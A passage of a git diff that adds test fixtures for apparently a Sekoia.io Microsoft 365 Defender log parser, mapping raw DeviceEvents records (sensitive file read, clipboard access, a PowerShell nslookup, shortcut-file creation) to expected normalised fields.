"{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "parent": { + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 100% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..3292ed6fe --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json @@ -0,0 +1,81 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..fea26327a --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json @@ -0,0 +1,81 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..672754009 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -0,0 +1,99 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 